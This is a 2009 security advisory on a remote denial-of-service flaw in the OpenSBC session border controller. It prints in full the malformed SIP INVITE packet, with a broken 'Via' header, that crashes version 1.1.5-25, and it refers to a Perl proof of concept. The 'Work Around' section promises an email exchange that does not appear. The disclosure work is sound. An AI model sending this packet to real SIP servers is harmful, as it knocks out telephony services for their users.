OpenSBC (INVITE of Death)
Advisory Draft Date: 2nd Feburary, 2009.Release Date: 16th Feburary, 2009.
Affected Application | OpenSBC Server | |
---|---|---|
Severity | High | |
Status | Disclosed | |
Reported To | Joegen Baclor (CTO Solegy Systems) | |
Author | M. Zubair Rafique and Dr. Muddassar Farooq |
Background
OpenSBC is an ongoing attempt to create an open-source Session Border Controller that is fully compliant with the mandates of RFC 3261. OpenSBC can be used as a SIP router, media anchor for farend NAT traversal, SIP egress and ingress trunking among others. More information about the server can be found at http://opensipstack.org/Overview
The INVITE of Death vulnerability in OpenSBC server allows the attacker to crash the server causing remote Denial of Service (DOS). The problem specifically exists in OpenSBC version 1.1.5-25 in the handling of “Via” field caused from maliciously crafted SIP packet.Proof of Concept
The proof of concept code can be downloaded from here: OpenSBC.pl.The malicious Packet on which the server crash is shown below:INVITE sip:bob@open-ims.test SIP/2.0
Via:::::: SIP/2.0/UDP localhost.localdomain:5060;branch=z9hG4bK000000
From: 0 ;tag=0
To: Receiver
Call-ID: 0@localhost.localdomain
CSeq: 1 INVITE
Contact: 0
Expires: 1200
Max-Forwards: 70
Content-Type: application/sdp
Content-Length: 131
v=0
o=0 0 0 IN IP4 localhost.localdomain
s=Session SDP
c=IN IP4 127.0.0.1
t=0 0
m=audio 9876 RTP/AVP 0
a=rtpmap:0 PCMU/8000
Work Around
The OpenSBC devolpment team has been reported about the vulnerability. Below is the E-mail exchange content between our research team and the CTO of Solegey Systems:
Credits
The vulnerability was discovered by Zubair Rafique and Sohail Aziz from the IMS security research project team.Contact
M. Zubair Rafique M. Ali AkbarZubair.rafique@nexginrc.org ali.akbar@nexginrc.org
+92-346-5356929 +92-321-2936105
Disclaimer
The contents of this advisory are copyright (c) 2009 nexGIN RC , and may be distributed freely provided that no fee is charged for this distribution and proper credit is given.
LINK: http://ims-bisf.nexginrc.org/OpenSBC-vul.html